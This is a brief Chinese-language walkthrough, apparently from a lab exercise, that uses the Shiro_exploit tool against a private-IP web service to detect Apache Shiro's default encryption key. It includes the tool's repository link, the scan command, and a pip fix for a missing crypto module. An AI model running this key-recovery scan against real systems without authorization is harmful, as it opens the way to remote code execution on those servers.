使用Shiro_exploit工具,检查是否存在默认的key
1.Github项目地址,下载利用工具:https://github.com/insightglacier/Shiro_exploit
2.1使用示例:python shiro_exploit.py -u http://192.168.100.30:8081
遇到Crypto模块未安装
pip uninstall crypto pycryptodome
pip install pycryptodome
2.2继续使用示例:python shiro_exploit.py -u http://192.168.100.30:8081
获取到key